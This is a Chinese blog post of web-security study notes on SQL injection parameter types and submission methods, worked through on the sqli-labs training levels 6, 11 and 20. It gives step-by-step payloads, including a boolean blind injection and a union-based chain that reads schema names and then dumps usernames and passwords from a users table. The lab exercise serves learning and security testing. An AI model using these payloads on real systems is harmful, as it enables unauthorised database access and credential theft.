Web漏洞-类型及提交注入

于 2024-03-21 11:54:26 发布
阅读量304 收藏 9
点赞数 4
分类专栏: Web安全笔记 文章标签: 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54190167/article/details/136904282
版权
参数类型:

数字、字符、搜索、JSON等

请求方法:

GET/POST/COOKIE/REQUEST/HTTP头等

$SERVER详解

https://www.cnblogs.com/wangshuazi/p/9765012.html

演示案例1:sqli-labs 6

1.先判断注入类型----为”的字符型

2.由回显可知是盲注,接着查数据库长度:8

Payload:id=1" and (length(database()))=8--+

后续操作依次对照sqli-labs 5

演示案例2:sqli-labs 11

1. 输入admin 、admin有回显页面

2. 判断数据类型---字符型

输入admin’ and 1=1# 正常

admin’ and 1=2# 失败

说明注入类型为字符型

3. 判断注入点:1,2

Payload:admin' and 1=2 union select 1,2#

4. 爆出数据库名字--security

Payload:admin’ and 1=2 union select database(),2#

5. 爆出表名---

Payload:admin’ and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema=’security’#

6. 爆字段名

Payload:admin’ and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_name=’users’#

7. 爆数据

Payload:admin' and 1=2 union select username,password from users#

演示案例3:sqli-labs 20

json格式详解:

https://www.cnblogs.com/hwtblog/p/8483573.html

(json注入常见于app中)

hacker_17Z
关注
专栏目录
【小迪安全学习笔记】WEB漏洞-注入类型提交注入
Akrios的博客
06-08 424
在真实SQL注入安全测试中,我们一定要先明确提交数据及提交方法后再进行注入,其中提交数据类型提交方法可以通过抓包分析获取,后续安全测试中我们也必须满足同等的操作才能进行注入。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021060822422727.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU
第14天:WEB漏洞-SQL注入类型提交注入1
08-03
在网络安全领域,SQL注入是一种常见的Web漏洞,攻击者通过向应用程序的输入字段中插入恶意的SQL代码,以篡改或获取数据库中的敏感信息。本文将详细介绍SQL注入类型及其提交方式,以及如何进行安全测试。 首先,...
web漏洞--注入漏洞
xsh951103的博客
01-07 2617
目录 1.Sql注入 2.Xml注入(xml实体注入,XXE) 3.远程文件包含漏洞 4.本地文件包含漏洞 5.命令注入漏洞 1.Sql注入 1.概念 1.SQL注入是一种Web应用代码中的漏洞。 2.黑客可以构造特殊数据库请求,使Web应用执行带有附加条件的SQL语句 用户请求中使用了带有参数的值,但是没有进行任何过滤 用户请求中使用了带有参数的值,没有进行任何转码 3.通过特殊的请求,Web应用向数据库访问时会附带其它命令: 任意查询命令 创建数据库/表 ...
web十大漏洞--sql注入
m0_71907084的博客
10-30 1533
例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法
WEB漏洞- 注入类型提交注入
硫酸超的博客
07-28 711
注入类型提交注入前言简要明确参数类型数字字符搜索简要明确请求方式演示 前言 在真实SQL注入安全测试中,我们一定要先明确提交数据及提交方法后再进行注入,其中提交数据类型提交方法可以通过抓包分析获取,后续安全测试中我们也必须满足同等的操作才能进行注入。 简要明确参数类型 数字 如果是数字的话可能不存在单引号 对方在数字上加单引号也是有可能的,要看对方的写法,因为纯数字的话加不加单引号是无所谓的,但还是得看前端的代码里有没有单引号 字符 一般是采用单引号 如果参数是字符的话那肯定是有单引号的 即使有
WEB攻防-通用漏洞&SQL注入-类型&提交方式&盲注
m0_65336233的博客
10-10 717
WEB攻防-通用漏洞&SQL注入-类型&提交方式&盲注
web攻击之三:SQL注入攻击的种类和防范手段
weixin_30328063的博客
10-21 323
观察近来的一些安全事件及其后果,安全专家们已经得到一个结论,这些威胁主要是通过SQL注入造成的。虽然前面有许多文章讨论了SQL注入,但今天所讨论的内容也许可帮助你检查自己的服务器,并采取相应防范措施。 SQL注入攻击的种类 1、内联 SQL 注入(Inline SQL Injection) 内联注入是指向查询注入一些SQL 代码后,原来的查询仍然会全部执行。 1.1、字符串内联...
【小迪安全day14】WEB漏洞——SQL注入类型提交注入
RichUee的博客
12-06 574
在真实 SQL 注入安全测试中,我们一定要先明确提交数据及提交方法后再进行注入,其中提交数据类型提交方法可以通过抓包分析获取,后续安全测试中我们也必须满足同等的操作才能进行注入
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
WEB 漏洞-SQL 注入之堆叠及 WAF 绕过注入 SQL 注入是一种常见的 WEB 漏洞攻击方式,通过将恶意 SQL 语句嵌入到 Web 应用程序的输入参数中,从而访问、修改或控制数据库的数据。堆叠注入(Stacked Injections)是 ...
第17天:WEB漏洞-SQL注入之二次,加解密,DNS等注入1
08-03
在网络安全领域,Web漏洞是常见的安全威胁之一,SQL注入是一种尤为危险的攻击方式。本文将深入探讨二次注入、加解密技术以及DNSlog注入的概念、原理,并通过具体案例和实际应用来阐述这些技术如何被利用。 **SQL...
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本。这些脚本可以劫持用户会话、盗取Cookie、操纵页面内容,甚至进行更复杂的攻击。在本文中,我们将深入探讨...
七、Web组件注入
weixin_46203713的博客
11-16 664
七、Web组件注入 1、Web原生组件注入(Servlet、Filter、Listener) 方式一:使用 @ServletComponentScan + web3.0注解的方式 在MainApplicationContext主启动类上加上ServletComponentScan("")注解 @ServletComponentScan("day01.view") @SpringBootApplication public class MainApplicationContext { publ
Web安全之SQL注入
最新发布
qq_42751192的博客
06-09 2300
SQL注入(SQL lnjection)是发生在 Web 程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至修改数据库。也就是说,SQL 注入就是在用户输入的字符串中添加 SQL 语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的 SQL 语句就会被数据库服务器误认为是正常的 SQL 语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
Web安全之注入漏洞详解及预防
路多辛的所思所想
01-31 910
注入类攻击是 Web 安全领域中最常见的攻击方式,注入攻击发生在当不可信的数据作为命令或者查询语句的一部分被发送给解释器的时候。预防注入类攻击的最好方法是代码审核,可以将静态的(SAST)、动态的(DAST)和交互式(IAST)的安全测试工具集成到 CI/CD 流程中,以便在部署到生产环境之前检测出并解决掉注入类安全问题。注意避免xml注入、代码注入、SQL注入、HTML注入注入型安全问题的发生,一定要在数据拼接的地方进行安全检查,对拼接内容进行严格校验和必要的转义处理。常见的注入漏洞及预防措施。
Web漏洞常见类型
OMG二黑的博客
07-28 1096
《代码审计 企业级Web代码安全架构》
CTF系列之Web——SQL注入
洛柒尘的博客
06-09 8680
前言 在刚学习sql注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的sql注入知识点。 学习web系列推荐先学习Mysql、H
WEB-漏洞总结(sql注入详解)
热门推荐
qq_50643984的博客
03-24 1万+
SQL注入 sql注入分类 1.post注入,get注入,cookie注入,http头注入(可能user-agent存在注入) 2.数字型注入,字符型注入(类似一个int,一个chr) 3.盲注:布尔盲注,时间盲注 报错注入:利用报错函数,常见报错函数 ...
web安全————注入(初识篇)
longger_lee
12-22 4743
注入攻击        注入攻击是web安全领域中最常见的一种攻击方式。注入攻击的本质就是把用户输入的数据当作代码执行,主要的两个关键条件:第一是用户能够控制输入,第二是原本程序要执行的代码拼接了用户输入的数据。在注入中,常见的就是SQL,下面我们来看看SQL注入的一些方法、技巧以及防御。        SQL注入        请看一个典型的SQL注入例子:        var
第11天-Web漏洞——必懂知识点
MCTSOG的博客
01-19 5675
实际应用中右边方框中的漏洞,碰到的概率比较大! 简要说明以上漏洞危害情况 SQL注入危害 1.攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。 2.可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。 3.如果网站目录存在写入权限,可以写入网页木马。攻击者进而可以对网页进行篡改,发布一些 违法信息等。 4.经过提权等步骤,服务器最高权限被攻击者获取。攻击者可以远程控制服务器,安装后门,得 以修改或控制操作系统 文件上传危害 如果 Web应用程序存在.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值